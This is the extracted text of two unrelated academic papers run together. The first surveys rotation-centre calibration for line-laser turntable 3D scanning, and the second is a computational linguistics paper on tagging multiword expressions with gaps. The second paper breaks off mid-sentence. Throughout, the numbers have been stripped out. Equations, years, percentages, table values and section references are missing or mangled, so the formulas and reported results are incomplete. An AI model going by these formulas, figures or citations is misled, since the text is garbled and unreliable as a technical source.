line laser three-dimensional scanning is to project one or more line lasers to the measured object, extract the laser stripe in the image, and calculate the three-dimensional data of the surface of the laser line, usually using high-precision three-coordinate, rotating platform or camera alignment the laser sensor performs positioning to complete three-dimensional scanning of the surface of the object to be measured, and obtain surface data of the three-dimensional object[ ][ ]. according to the different mechanical displacement platforms, mechanical scanning mainly has two implementations of translation platform and rotary platform. rotating scanning is more convenient and faster. a more accurate rotation center calibration can improve the accuracy of point cloud reconstruction and improve the d contour reconstruction of the measured object. the reconstruction of the rotating platform can be divided into three types according to the different movement modes: the first is that the camera rotates around the rotating axis [ ], and the measured object does not move; the second is that the camera does not move, and the object rotates with the rotating platform [ ] the third is that the camera and the object are combined and rotated at the same time[ ]. the rotating platform is suitable for scanning objects with swivel features. the object is placed on a rotating platform for linear laser rotation scanning. at doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , this time, the visible object is rigidly transformed around the axis of the rotating platform [ ], and the left and right camera point clouds can be constructed by using the rotation center and the rotation angle obtained after the platform calibration process. the rotation matrix between the two, the rotation matrix is multiplied by the current point cloud, the point cloud obtained by the left and right cameras can be registered to the same coordinate system, thereby realizing the automatic registration of the point cloud on the surface of the rotating platform [ ]. ii. camera calibration calibration is simply a matter of establishing a reference point between a pixel coordinate system of an image and a world three-dimensional coordinate system. the essence of the transformation relationship is the geometric principle of camera imaging. the ultimate goal of calibration is to obtain the camera's internal parameters as well as external parameters. the internal parameters of the camera are determined by the camera's own characteristics. the external parameters of the camera are used to establish the mutual conversion relationship between the local world coordinate system and the camera coordinate system in the actual process [ ][ ]. the camera's parameters have a direct impact on the accuracy of the reconstructed model, so the accuracy of the camera parameters is very important. in general, camera calibration is required before solving the center of rotation. iii. rotation center calibration because the line laser scans once, it can only measure the surface of the object to be measured at a given angle of view. if you want to measure the contour of an object for a week, you can measure it by rotation, measure the object from multiple angles of view, and point cloud data from multiple angles of view. spliced in the same coordinate system. accurately calibrating the center of the turntable (rotation center) is the key to rotating measurements and multi-view assembly. rotation center: in a plane, a figure rotates a certain angle around a point o to get the other figure to change into rotation, and point o is the center of rotation. during the rotational scanning, the measured object starts from a fixed angle and starts to rotate degrees around the axis of rotation or the center of rotation. however, the center of rotation of the rotating platform is unknown. in order to obtain the three- dimensional contour of the rotating object, it is necessary to obtain the rotation center of the rotating platform by means of a calibration block or a pasting marker point. after the center of rotation is obtained, the subsequent rotation and splicing can be performed. since the subsequent splicing work is spliced according to the position of the center of rotation, the extraction work of the center of rotation is very important. the schematic diagram of the line laser double triangle rotation scan is shown in the figure below, where the center of rotation is the center of the stage. laser right camera left camera objectiv e table rotating platform rotation direction figure . schematic diagram of line laser double triangle rotation scanning iv. rotation center calibration method a. ellipse fitting method the center of rotation can also be obtained by dividing the plane edge of the rotating platform in the left and right images, and then performing ellipse fitting on the obtained plane edge, and obtaining the center coordinates of the ellipse by the least squares fitting method. it is the center of rotation of the rotating platform [ ]. x y f l l o figure . ellipse fitting international journal of advanced network, monitoring and controls volume , no. , as shown in figure above, point ),( yxf is a point on the ellipse, and the focus of the ellipse is ),( yxl and ),( yxl . colol    since the sum of the distances from any point on the ellipse to the two focal points is a constant a, there is an error between the sum of the actual distances, and the error is θ. as shown in the following formula ( ):   aflfl   the above formula ( ) is specifically expanded as follows:  ayyxxyyxx )()( )()(   using the above formula, the point cloud of the elliptical edge can be fitted by the least squares method, and the estimated values of the five parameters are obtained, and then linearized and solved iteratively. the criteria for the iterative solution process are: it is necessary to eliminate the edge point cloud data whose absolute value of the error θ is greater than or equal to . β after each ellipse fitting. (β: standard error of unit weight after each iterative fitting) between two adjacent iterative fittings, the absolute value of the distance of any elliptical focus position must be less than a certain pixel value (typically . pixels). if it is greater than or equal to this pixel, the iteration will end immediately. in the formula ( ), the order:  ' ' )( yyxxl  )(    ' ' )( yyxxl  )(   let fl , fl be partial to x , x , y , y . then the above formula expands to:         ' ' ' ' allay l yy x l xx y l yy x l xx   ' x , ' y , ' x , ' y represents the initial value of the coordinate of the focus, and the focus satisfies the relationship as follows:  ' xxx  , ' xxx     ' yyy  , ' yyy     aaa    the initial position obtained is used as the initial value, and the point cloud data of the ellipse edge is fitted by the least squares method step by step iteration [ ], then the parameter ( x , x , y , y , a ) can be solved, and the elliptical center ),( yxo of the last fitting is:  xx x   , yy y     b. symmetry method since the image on the rotating platform has symmetry after being rotated by degrees and is symmetrical about the center of rotation, a plurality of laser lines can be selected on the auxiliary pattern to perform calculation of the center of rotation to ensure accuracy. finally, the parameters obtained can be optimized by methods such as bp neural network. in order to accurately calibrate the center of rotation, the straight line equations of the two straight lines ss and ' ' ss are fitted on the premise that the rotation angle of the rotating platform is known. find the intersection o between the two lines. the intersection point o is the rotation center of the rotating platform. the point s is located at the position of the point ' s after being rotated by degrees, and point s is rotated degrees and is located at point ' s . s , o, ' s three points are collinear, and after rotation, are symmetric with respect to the rotation center o before rotation [ ]. the principle of symmetry is shown in figure . below. o ),x( ys ),x( ys ),x( ' ' ' ys ),x( ' ' ' ys figure . symmetrical view of the center of rotation international journal of advanced network, monitoring and controls volume , no. , the calibration process of the symmetrical rotation platform is: ( ) firstly, the rotating platform is adjusted to the working position, the auxiliary pattern is pasted on the rotating platform or the circular calibration block is placed, and the line laser is passed through the center of the rotating platform; ( ) rotate the rotating platform at an angle ( degrees) and start collecting data; ( ) extracting the center coordinates of the laser stripe in the data as pixel coordinates; ( ) calculating the world coordinates corresponding to the pixel coordinate system and storing the sample set; ( ) after rotating degrees, the sample set is derived for calculation of the rotation parameters. c. plane fitting in the three-dimensional reconstruction of the rotating scanning mode, the obtained rotating point cloud is plane-fitted to fit the rotation center of the rotating platform [ ]. the line laser emitter emits a laser beam that intersects the surface of the calibration block. as shown in the figure below, point a emits a line laser, and bc is the line of intersection between the laser and the calibration block. the plane formed between points a, b, and c is a light plane. the points in the light plane ( Δ abc) conform to the plane equation ( ). in online laser scanning, the acquired point clouds are all in the light plane, so all point clouds conform to the plane equation ( ):  a  dczbyx   the n point cloud data obtained by the rotation scan are sequentially brought into the upper equation of the light plane.           dczbyax dczbyax dczbyax nnn     line laser transmitter right camera left camera space laser plane p p p a b c figure . light plane equation there are unknown n equations, and the values of four unknowns a, b, c, d can be solved by least squares method. the center of rotation of the rotating platform can be expressed as:  ) , , (      n i i n i n i ii z n y n x n o   in general, by gradually increasing the height of the rotating platform, a series of center points can be fitted in a straight line, so that the rotation axis can be calibrated. then through the rodrigo rotation formula [ ], we can complete the coordinate transformation and so on. the comparison between the calibration methods of the center of rotation is shown in table below. international journal of advanced network, monitoring and controls volume , no. , table i. comparison between rotation center calibration methods calibration method advantage disadvantage applicable situation ellipse fitting method it can reduce the error in the measurement process with high precision. during the fitting process, the number of iterations is variable and it takes a lot of time. due to interference of factors such as position and angle, the extracted edge contour is elliptical. or the calibration block is elliptical. symmetry method the principle is simple and easy to understand, and the accuracy is high. it is necessary to select multiple locations for testing, and to obtain an average value, which takes a lot of time. suitable for circular rotating platforms. or a circular calibration block. the point cloud obtained by scanning has higher precision. plane fitting the operation is simple, no need to manually paste the mark points, and the speed is fast. the accuracy is low. suitable for circular rotating platforms. or a circular calibration block. v. conclusion this paper introduces the basic process of linear laser rotation scanning. the measured object starts from a fixed angle and starts to rotate degrees around the rotation axis or rotation center to obtain the three-dimensional contour of the rotating object. the basic knowledge of the rotating center of the rotating platform parameters during the rotating scanning process is introduced, and the calibration methods of the three rotating centers are summarized. the principles and steps of these three calibration methods are analyzed in detail. the advantages and disadvantages of the three methods and their application are summarized. it lays a theoretical foundation for the study of the calibration method of the rotating center. acknowledgment this work is partially supported by science & technology program of weiyang district of xi'an city with project “ ". references [ ] choi s, kim p, boutilier r, et al. development of a high speed laser scanning confocal microscope with an acquisition rate up to frames per second[j]. optics express, , ( ): - . [ ] wei z, huadong g, qi l, et al. fine deformation monitoring of ancient building based on terrestrial laser scanning technologies[c].iop conference series: earth and environmental science. iop publishing, : - . [ ] zhong s d , xiong j , liu y . -d reconstruction technology based on full circle multiple views[j]. robot, , ( ): - . [ ] wei h . an approach for multiple-view data capture by a single- view d camera using a simple revolve device[j]. journal of applied sciences, . [ ] zhang a w, ming-zhe l i, shao-xing h u. d surface measurement key technique based on computer vision[j]. systems engineering & electronics, . [ ] zhou l, zheng s. a registration algorithm for point clouds obtained by scanning objects on turntable[j]. acta geodaetica et cartographica sinica, , ( ): - . [ ] xi l , yuexian z , renju l i , et al. -d surface integration in structured light -d scanning[j]. journal of tsinghua university, , ( ): - . [ ] zhang z. a flexible new technique for camera calibration[j]. microsoft research, , ( ): - . [ ] tsai r y. a versatile camera calibration technique for high-accuracy d machine vision metrology using off-the-shelf tv cameras and lenses[j]. ieee journal on robotics & automation, , ( ): - . [ ] cheng h , huaming y, zgang j . structural light based computer vision [m]. national defense industry press, . [ ] mingjing c , yuanmin f , jie c . fitting of circular curve based on least square method and iterative method[j]. science of surveying & mapping, . [ ] fuxing l. accuracy analysis of determining coordinates of rotation center of indexing table[j]. mechanical industry standardization and quality, ( ): - . [ ] wq. d reconstruction based on the structured light and turntable[d].university of electronic science and technology, . [ ] zelinsky a . learning opencv---computer vision with the opencv library (bradski, g.r. et al.; )[on the shelf][j]. ieee robotics & automation magazine, , ( ): - . discriminative lexical semantic segmentation with gaps: running the mwe gamut discriminative lexical semantic segmentation with gaps: running the mwe gamut nathan schneider emily danchik chris dyer noah a. smith school of computer science carnegie mellon university pittsburgh, pa , usa {nschneid,emilydan,cdyer,nasmith}@cs.cmu.edu abstract we present a novel representation, evaluation measure, and supervised models for the task of identifying the multiword expressions (mwes) in a sentence, resulting in a lexical seman- tic segmentation. our approach generalizes a standard chunking representation to encode mwes containing gaps, thereby enabling effi- cient sequence tagging algorithms for feature- rich discriminative models. experiments on a new dataset of english web text offer the first linguistically-driven evaluation of mwe iden- tification with truly heterogeneous expression types. our statistical sequence model greatly outperforms a lookup-based segmentation pro- cedure, achieving nearly % f for mwe identification. introduction language has a knack for defying expectations when put under the microscope. for example, there is the notion—sometimes referred to as compositionality— that words will behave in predictable ways, with indi- vidual meanings that combine to form complex mean- ings according to general grammatical principles. yet language is awash with examples to the contrary: in particular, idiomatic expressions such as awash with np, have a knack for vp-ing, to the contrary, and defy expectations. thanks to processes like metaphor and grammaticalization, these are (to various degrees) semantically opaque, structurally fossilized, and/or statistically idiosyncratic. in other words, idiomatic expressions may be exceptional in form, function, or distribution. they are so diverse, so unruly, so . mw named entities: prime minister tony blair . mw compounds: hot air balloon, skinny dip . conventionally sw compounds: somewhere . verb-particle: pick up, dry out, take over, cut short . verb-preposition: refer to, depend on, look for . verb-noun(-preposition): pay attention (to) . support verb: make decisions, take pictures . other phrasal verb: put up with, get rid of . pp modifier: above board, at all, from time to time . coordinated phrase: cut and dry, more or less . connective: as well as, let alone, in spite of . semi-fixed vp: pick up where <one> left off . fixed phrase: scared to death, leave of absence . phatic: you’re welcome. me neither! . proverb: beggars can’t be choosers. figure : some of the classes of idioms in english. the examples included here contain multiple lexicalized words—with the exception of those in ( ), if the conven- tional single-word (sw) spelling is used. difficult to circumscribe, that entire theories of syn- tax are predicated on the notion that constructions with idiosyncratic form-meaning mappings (fillmore et al., ; goldberg, ) or statistical properties (goldberg, ) offer crucial evidence about the grammatical organization of language. here we focus on multiword expressions (mwes): lexicalized combinations of two or more words that are exceptional enough to be considered as single units in the lexicon. as figure illus- trates, mwes occupy diverse syntactic and semantic functions. within mwes, we distinguish (a) proper names and (b) lexical idioms. the latter have proved themselves a “pain in the neck for nlp” (sag et al., ). automatic and efficient detection of mwes, though far from solved, would have diverse appli- transactions of the association for computational linguistics, ( ) – . action editor: joakim nivre. submitted / ; revised / ; published / . c© association for computational linguistics. cations including machine translation (carpuat and diab, ), information retrieval (newman et al., ), opinion mining (berend, ), and second language learning (ellis et al., ). it is difficult to establish any comprehensive tax- onomy of multiword idioms, let alone develop lin- guistic criteria and corpus resources that cut across these types. consequently, the voluminous litera- ture on mwes in computational linguistics—see § , baldwin and kim ( ), and ramisch ( ) for surveys—has been fragmented, looking (for exam- ple) at subclasses of phrasal verbs or nominal com- pounds in isolation. to the extent that mwes have been annotated in existing corpora, it has usually been as a secondary aspect of some other scheme. traditionally, such resources have prioritized certain kinds of mwes to the exclusion of others, so they are not appropriate for evaluating general-purpose identification systems. in this article, we briefly review a shallow form of analysis for mwes that is neutral to expression type, and that facilitates free text annotation with- out requiring a prespecified mwe lexicon (§ ). the scheme applies to gappy (discontinuous) as well as contiguous expressions, and allows for a qualitative distinction of association strengths. in schneider et al. ( ) we have applied this scheme to fully an- notate a , -word corpus of english web reviews (bies et al., a), a conversational genre in which colloquial idioms are highly salient. this article’s main contribution is to show that the representation— constrained according to linguistically motivated as- sumptions (§ )—can be transformed into a sequence tagging scheme that resembles standard approaches in named entity recognition and other text chunking tasks (§ ). along these lines, we develop a discrim- inative, structured model of mwes in context (§ ) and train, evaluate, and examine it on the annotated corpus (§ ). finally, in § and § we comment on related work and future directions. annotated corpus to build and evaluate a multiword expression ana- lyzer, we use the mwe-annotated corpus of schnei- der et al. ( ). it consists of informal english web text that has been specifically and completely anno- tated for mwes, without reference to any particular lexicon. to the best of our knowledge, this corpus is the first to be freely annotated for many kinds of mwes (without reference to a lexicon), and is also the first dataset of social media text with mwe an- notations beyond named entities. this section gives a synopsis of the annotation conventions used to de- velop that resource, as they are important to under- standing our models and evaluation. rationale. the multiword expressions community has lacked a canonical corpus resource comparable to benchmark datasets used for problems such as ner and parsing. consequently, the mwe litera- ture has been driven by lexicography: typically, the goal is to acquire an mwe lexicon with little or no supervision, or to apply such a lexicon to corpus data. studies of mwes in context have focused on various subclasses of constructions in isolation, ne- cessitating special-purpose datasets and evaluation schemes. by contrast, schneider et al.’s ( ) cor- pus creates an opportunity to tackle general-purpose mwe identification, such as would be desirable for use by high-coverage downstream nlp systems. it is used to train and evaluate our models below. the cor- pus is publicly available as a benchmark for further research. data. the documents in the corpus are online user reviews of restaurants, medical providers, retailers, automotive services, pet care services, etc. marked by conversational and opinionated language, this genre is fertile ground for colloquial idioms (nunberg et al., ; moon, ). the reviews ( , words, , sentences) in the english web tree- bank (wtb; bies et al., b) were collected by google, tokenized, and annotated with phrase struc- ture trees in the style of the penn treebank (marcus et al., ). mwe annotators used the sentence and word tokenizations supplied by the treebank. annotation scheme. the annotation scheme itself was designed to be as simple as possible. it consists of grouping together the tokens in each sentence that belong to the same mwe instance. while annotation guidelines provide examples of mwe groupings in a wide range of constructions, the annotator is not http://www.ark.cs.cmu.edu/lexsem/ because we use treebank data, syntactic parses are available to assist in post hoc analysis. syntactic information was not shown to annotators. # of constituent tokens ≥ total strong weak # of gaps table : counts in the mwe corpus. tied to any particular taxonomy or syntactic structure. this simplifies the number of decisions that have to be made for each sentence, even if some are difficult. further instructions to annotators included: • groups should include only the lexically fixed parts of an expression (modulo inflectional morphology); this generally excludes determiners and pronouns: made the mistake, pride themselves on. • multiword proper names count as mwes. • misspelled or unconventionally spelled tokens are interpreted according to the intended word if clear. • overtokenized words (spelled as two tokens, but conventionally one word) are joined as multiwords. clitics separated by the tokenization in the corpus— negative n’t, possessive ’s, etc.—are joined if func- tioning as a fixed part of a multiword (e.g., t ’s cafe), but not if used productively. gaps. there are, broadly speaking, three reasons to group together tokens that are not fully contigu- ous. most commonly, gaps contain internal modifiers, such as good in make good decisions. syntactic con- structions such as the passive can result in gaps that might not otherwise be present: in good decisions were made, there is instead a gap filled by the pas- sive auxiliary. finally, some mwes may take internal arguments: they gave me a break. figure has addi- tional examples. multiple gaps can occur even within the same expression, though it is rare: they agreed to give bob a well-deserved break. strength. the annotation scheme has two “strength” levels for mwes. clearly idiomatic ex- pressions are marked as strong mwes, while mostly compositional but especially frequent collocations/ phrases (e.g., abundantly clear and patently obvious) are marked as weak mwes. weak multiword groups are allowed to include strong mwes as constituents (but not vice versa). strong groups are required to cohere when used inside weak groups: that is, a weak group cannot include only part of a strong group. for purposes of annotation, there were no constraints hinging on the ordering of tokens in the sentence. process. mwe annotation proceeded one sentence at a time. the annotators referred to and improved the guidelines document on an ongoing basis. every sentence was seen independently by at least an- notators, and differences of opinion were discussed and resolved (often by marking a weak mwe as a compromise). see schneider et al. ( ) for details. statistics. the annotated corpus consists of documents ( , sentences). mwes are frequent in this domain: % of sentences ( % of sentences over words long) and % of documents contain at least one mwe. , / , = % of tokens belong to an mwe; in total, there are , mwe instances. ( %) are strong mwes containing a gold-tagged proper noun—most are proper names. a breakdown appears in table . representation and task definition we define a lexical segmentation of a sentence as a partitioning of its tokens into segments such that each segment represents a single unit of lexical meaning. a multiword lexical expression may contain gaps, i.e. interruptions by other segments. we impose two restrictions on gaps that appear to be well-motivated linguistically: • projectivity: every expression filling a gap must be completely contained within that gap; gappy expressions may not interleave. • no nested gaps: a gap in an expression may be filled by other single- or multiword expressions, so long as those do not themselves contain gaps. formal grammar. our scheme corresponds to the following extended cfg (thatcher, ), where s is the full sentence and terminals w are word tokens: s → x+ x → w+ (y+ w+)∗ y → w+ each expression x or y is lexicalized by the words in one or more underlined variables on the right-hand side. an x constituent may optionally contain one or more gaps filled by y constituents, which must not contain gaps themselves. mwes with multiple gaps are rare but attested in data: e.g., putting me at my ease. we encountered one violation of the gap nesting constraint in the reviews data: i have nothing but fantastic things to say . additionally, the interrupted phrase denoting multiword groupings with subscripts, my wife had taken her ’ ford fusion in for a routine oil change contains multiword groups—{taken, in}, {’ , ford, fusion}, {oil, change}—and single-word groups. the first mwe is gappy (ac- centuated by the box); a single word and a contiguous multiword group fall within the gap. the projectivity constraint forbids an analysis like taken her ’ ford fusion , while the gap nesting constraint for- bids taken her ’ ford fusion in . . two-level scheme: strong vs. weak mwes our annotated data distinguish two strengths of mwes as discussed in § . augmenting the gram- mar of the previous section, we therefore designate nonterminals as strong (x , y ) or weak (x̃ , ỹ ): s → x̃+ x̃ → x+ (ỹ + x+)∗ x → w+ (ỹ + w+)∗ ỹ → y + y → w+ a weak mwe may be lexicalized by single words and/or strong multiwords. strong multiwords cannot contain weak multiwords except in gaps. further, the contents of a gap cannot be part of any multiword that extends outside the gap. for example, consider the segmentation: he was willing to budge a little on the price which means a lot to me . subscripts denote strong mw groups and superscripts weak mw groups; un- marked tokens serve as single-word expressions. the mw groups are thus {budge, on}, {a, little}, {a, lot}, and {means, {a, lot}, to, me}. as should be evident from the grammar, the projectivity and gap-nesting constraints apply here just as in the -level scheme. . evaluation matching criteria. given that most tokens do not belong to an mwe, to evaluate mwe identification we adopt a precision/recall-based measure from the coreference resolution literature. the muc criterion (vilain et al., ) measures precision and recall great gateways never before , so far as hudson knew , seen by europeans was annotated in another corpus. this was violated times in our annotated data: modifiers within gaps are sometimes collocated with the gappy expression, as in on a tight budget and have little doubt . of links in terms of groups (units) implied by the transitive closure over those links. it can be defined as follows: let a Ð b denote a link between two elements in the gold standard, and aÐ̂b denote a link in the system prediction. let the ∗ operator denote the tran- sitive closure over all links, such that ⟦aÐ∗b⟧ is if a and b belong to the same (gold) set, and other- wise. assuming there are no redundant links within any annotation (which in our case is guaranteed by linking consecutive words in each mwe), we can write the muc precision and recall measures as: p = ∑a,b∶aÐ̂b ⟦aÐ∗b⟧∑a,b∶aÐ̂b r = ∑a,b∶aÐb ⟦aÐ̂∗b⟧∑a,b∶aÐb this awards partial credit when predicted and gold expressions overlap in part. requiring full mwes to match exactly would arguably be too stringent, over- penalizing larger mwes for minor disagreements. we combine precision and recall using the standard f measure of their harmonic mean. this is the link- based evaluation used for most of our experiments. for comparison, we also report some results with a more stringent exact match evaluation where the span of the predicted mwe must be identical to the span of the gold mwe for it to count as correct. strength averaging. recall that the -level scheme (§ . ) distinguishes strong vs. weak links/ groups, where the latter category applies to reason- ably compositional collocations as well as ambigu- ous or difficult cases. if where one annotation uses a weak link the other has a strong link or no link at all, we want to penalize the disagreement less than if one had a strong link and the other had no link. to accommodate the -level scheme, we therefore average f↑ , in which all weak links have been con- verted to strong links, and f↓ , in which they have been removed: f = (f↑ + f↓ ). if neither annota- tion contains any weak links, this equals the muc as a criterion for coreference resolution, the muc measure has perceived shortcomings which have prompted several other measures (see recasens and hovy, for a review). it is not clear, however, whether any of these criticisms are relevant to mwe identification. a link between a and b is redundant if the other links already imply that a and b belong to the same set. a set of n elements is expressed non-redundantly with exactly n − links. overall precision and recall are likewise computed by aver- aging “strengthened” and “weakened” measurements. no gaps, -level he o was o willing o to o budge o a b little i on o the o price o which o means b a i lot i to i me i . o (o∣bi+)+ no gaps, -level he o was o willing o to o budge o a b little ī on o the o price o which o means b a ĩ lot ī to ĩ me ĩ . o (o∣b[īĩ]+)+ gappy, -level he o was o willing o to o budge b a b little i on i the o price o which o means b a i lot i to i me i . o (o∣b(o∣bi+∣i)∗i+)+ gappy, -level he o was o willing o to o budge b a b little ı̄ on ī the o price o which o means b a ĩ lot ī to ĩ me ĩ . o (o∣b(o∣b[ı̄ı̃]+∣[īĩ])∗[īĩ]+)+ figure : examples and regular expressions for the tagging schemes. strong links are depicted with solid arcs, and weak links with dotted arcs. the bottom analysis was provided by an annotator; the ones above are simplifications. score because f = f↑ = f↓ . this method applies to both the link-based and exact match evaluation criteria. tagging schemes following (ramshaw and marcus, ), shallow an- alysis is often modeled as a sequence-chunking task, with tags containing chunk-positional information. the bio scheme and variants (e.g., bilou; ratinov and roth, ) are standard for tasks like named entity recognition, supersense tagging, and shallow parsing. the language of derivations licensed by the gram- mars in § allows for a tag-based encoding of mwe analyses with only bigram constraints. we describe tagging schemes for mwe identification, starting with bio and working up to more expressive variants. they are depicted in figure . no gaps, -level ( tags). this is the standard con- tiguous chunking representation from ramshaw and marcus ( ) using the tags {o b i}. o is for to- kens outside any chunk; b marks tokens beginning a chunk; and i marks other tokens inside a chunk. multiword chunks will thus start with b and then i. b must always be followed by i; i is not allowed at the beginning of the sentence or following o. no gaps, -level ( tags). we can distinguish strength levels by splitting i into two tags: ī for strong expressions and ĩ for weak expressions. to express strong and weak contiguous chunks requires tags: {o b ī ĩ}. (marking b with a strength as well would be redundant because mwes are never length- one chunks.) the constraints on ī and ĩ are the same as the constraints on i in previous schemes. if ī and ĩ occur next to each other, the strong attachment will receive higher precedence, resulting in analysis of strong mwes as nested within weak mwes. gappy, -level ( tags). because gaps cannot themselves contain gappy expressions (we do not support full recursivity), a finite number of additional tags are sufficient to encode gappy chunks. we there- fore add lowercase tag variants representing tokens within a gap: {o o b b i i}. in addition to the con- straints stated above, no within-gap tag may occur at the beginning or end of the sentence or immediately following or preceding o. within a gap, b, i, and o behave like their out-of-gap counterparts. gappy, -level ( tags). tags are required to en- code the -level scheme with gaps: {o o b b ī ı̄ ĩ ı̃}. variants of the inside tag are marked for strength of the incoming link—this applies gap-externally (capi- talized tags) and gap-internally (lowercase tags). if ī or ĩ immediately follows a gap, its diacritic reflects the strength of the gappy expression, not the gap’s contents. model with the above representations we model mwe iden- tification as sequence tagging, one of the paradigms that has been used previously for identifying con- tiguous mwes (constant and sigogne, , see § ). constraints on legal tag bigrams are sufficient to ensure the full tagging is well-formed subject to the regular expressions in figure ; we enforce these hierarchical modeling based on our representations is left to future work. constraints in our experiments. in nlp, conditional random fields (lafferty et al., ) and the structured perceptron (collins, ) are popular techniques for discriminative sequence modeling with a convex loss function. we choose the second approach for its speed: learning and in- ference depend mainly on the runtime of the viterbi algorithm, whose asymptotic complexity is linear in the length of the input and (with a first-order markov assumption) quadratic in the number of tags. below, we review the structured perceptron and discuss our cost function, features, and experimental setup. . cost-augmented structured perceptron the structured perceptron’s (collins, ) learn- ing procedure, algorithm , generalizes the classic perceptron algorithm (freund and schapire, ) to incorporate a structured decoding step (for sequences, the viterbi algorithm) in the inner loop. thus, train- ing requires only max inference, which is fast with a first-order markov assumption. in training, features are adjusted where a tagging error is made; the pro- cedure can be viewed as optimizing the structured hinge loss. the output of learning is a weight vector that parametrizes a feature-rich scoring function over candidate labelings of a sequence. to better align the learning algorithm with our f -score–based mwe evaluation (§ . ), we use a cost-augmented version of the structured perceptron that is sensitive to different kinds of errors during training. when recall is the bigger obstacle, we can adopt the following cost function: given a sentence x, its gold labeling y∗, and a candidate labeling y′, cost(y∗,y′,x) = ∣y ∗∣∑ j= c(y ∗ j ,y ′ j) where c(y∗,y′) = ⟦y∗ ≠ y′⟧+ρ⟦y∗ ∈ {b,b}∧y′ ∈ {o,o}⟧ a single nonnegative hyperparameter, ρ , controls the tradeoff between recall and accuracy; higher ρ biases the model in favor of recall (possibly hurt- ing accuracy and precision). this is a slight variant of the recall-oriented cost function of mohit et al. ( ). the difference is that we only penalize beginning-of-expression recall errors. preliminary the -tag scheme licenses tag bigrams: sequences such as b o and o ı̄ are prohibited. there are also constraints on the allowed tags at the beginning and end of the sequence. input: data ⟨⟨x(n),y(n)⟩⟩n n= ; number of iterations m w ← w ← t ← for m = to m do for n = to n do⟨x,y⟩ ← ⟨x(n),y(n)⟩ ŷ ← arg maxy′ (w⊺g(x,y′)+cost(y,y′,x)) if ŷ ≠ y then w ← w+g(x,y)−g(x,ŷ) w ← w+tg(x,y)−tg(x,ŷ) end t ← t + end end output: w−(w/t) algorithm : training with the averaged perceptron. (adapted from daumé, , p. .) experiments showed that a cost function penalizing all recall errors—i.e., with ρ⟦y∗ ≠ o∧ y′ = o⟧ as the second term, as in mohit et al.—tended to append additional tokens to high-confidence mwes (such as proper names) rather than encourage new mwes, which would require positing at least two new non- outside tags. . features basic features. these are largely based on those of constant et al. ( ): they look at word unigrams and bigrams, character prefixes and suffixes, and pos tags, as well as lexicon entries that match lemmas of multiple words in the sentence. appendix a lists the basic features in detail. some of the basic features make use of lexicons. we use or construct lists of english mwes: all multiword entries in wordnet (fellbaum, ); all multiword chunks in semcor (miller et al., ); all multiword entries in english wiktionary; the wikimwe dataset mined from english wikipedia (hartmann et al., ); the said database of phrasal lexical idioms (kuiper et al., ); the named entities and other mwes in the wsj corpus on the english side of the cedt (hajič et al., ); the wordnet api in nltk (bird et al., ) was used for lemmatization. http://en.wiktionary.org; data obtained from https://toolserver.org/~enwikt/definitions/ enwikt-defs- -en.tsv.gz lookup supervised model preexising lexicons entries max gap length p r f σ p r f σ none . . . . wordnet + semcor k . . . . . . . . lexicons k . . . . . . . . lexicons k . . . . . . . . best configuration with in-domain lexicon . . . . . . . . lexicons + mwtypes(train)≥ lexicons + mwtypes(train)≥ table : use of lexicons for lookup-based vs. statistical segmentation. supervised learning used only basic features and the structured perceptron, with the -tag scheme. results are with the link-based matching criterion for evaluation. top: comparison of preexisting lexicons. “ lexicons” refers to wordnet and semcor plus said, wikimwe, phrases.net, and english wiktionary; “ lexicons” adds mwes from cedt, vnc, lvc, and oyz. (in these lookup-based configurations, allowing gappy mwes never helps performance.) bottom: combining preexisting lexicons with a lexicon derived from mwes annotated in the training portion of each cross-validation fold at least once (lookup) or twice (model). all precision, recall, and f percentages are averaged across folds of cross-validation on train; standard deviations are shown for the f score. in each column, the highest value using only preexisting lexicons is underlined, and the highest overall value is bolded. the boxed row indicates the configuration used as the basis for subsequent experiments. the verb-particle constructions (vpcs) dataset of (baldwin, ); a list of light verb constructions (lvcs) provided by claire bonial; and two idioms websites. after preprocessing, each lexical entry consists of an ordered sequence of word lemmas, some of which may be variables like <something>. given a sentence and one or more of the lexicons, lookup proceeds as follows: we enumerate entries whose lemma sequences match a sequence of lemma- tized tokens, and build a lattice of possible analyses over the sentence. we find the shortest path (i.e., using as few expressions as possible) with dynamic programming, allowing gaps of up to length . unsupervised word clusters. distributional clus- tering on large (unlabeled) corpora can produce lexi- cal generalizations that are useful for syntactic and semantic analysis tasks (e.g.: miller et al., ; koo et al., ; turian et al., ; owoputi et al., ; grave et al., ). we were interested to see whether a similar pattern would hold for mwe identification, given that mwes are concerned with what is lexi- cally idiosyncratic—i.e., backing off from specific lexemes to word classes may lose the mwe-relevant information. brown clustering (brown et al., ) http://www.phrases.net/ and http://home. postech.ac.kr/~oyz/doc/idiom.html each top-level lexical expression (single- or multiword) incurs a cost of ; each expression within a gap has cost . . with liang’s ( ) implementation: https://github. com/percyliang/brown-cluster. we obtain , clusters on the -million-word yelp academic dataset (which is similar in genre to the annotated web re- views data) gives us a hard clustering of word types. to our tagger, we add features mapping the previ- ous, current, and next token to brown cluster ids. the feature for the current token conjoins the word lemma with the cluster id. part-of-speech tags. we compared three ptb- style pos taggers on the full reviews subcor- pus (train+test). the stanford corenlp tagger (toutanova et al., ) yields an accuracy of . %. the ark tweetnlp tagger v. . . (owoputi et al., ) achieves . % with the model trained on the twitter corpus of ritter et al. ( ), and . % when trained on the answers, email, newsgroup, and weblog subcorpora of wtb. we use this third con- figuration to produce automatic pos tags for training and testing our mwe tagger. (a comparison condi- tion in § . uses oracle pos tags.) . experimental setup the corpus of web reviews described in § is used for training and evaluation. arbitrarily chosen documents ( sentences, , words) were held from words appearing at least times. https://www.yelp.com/academic_dataset v. . . , with english-bidirectional-distsim http://www.ark.cs.cmu.edu/tweetnlp/model. ritter_ptb_alldata_fixed. link-based exact match configuration m ρ ∣w∣ p r f p r f base model — , k . . . . . . + recall cost , k . . . . . . + clusters , k . . . . . . + oracle pos , k . . . . . . table : comparison of supervised models on test (using the -tag scheme). the base model corresponds to the boxed result in table table , but here evaluated on test. for each configuration, the number of training iterations m and (except for the base model) the recall-oriented hyperparameter ρ were tuned by cross-validation on train. out as a final test set. this left , sentences/ , words for training/development (train). fea- ture engineering and hyperparameter tuning were conducted with -fold cross-validation on train. the -tag scheme is used except where otherwise noted. in learning with the structured perceptron (algo- rithm ), we employ two well-known techniques that can both be viewed as regularization. first, we use the average of parameters over all timesteps of learn- ing. second, within each cross-validation fold, we de- termine the number of training iterations (epochs) m by early stopping—that is, after each iteration, we use the model to decode the held-out data, and when that accuracy ceases to improve, use the previous model. the two hyperparameters are the number 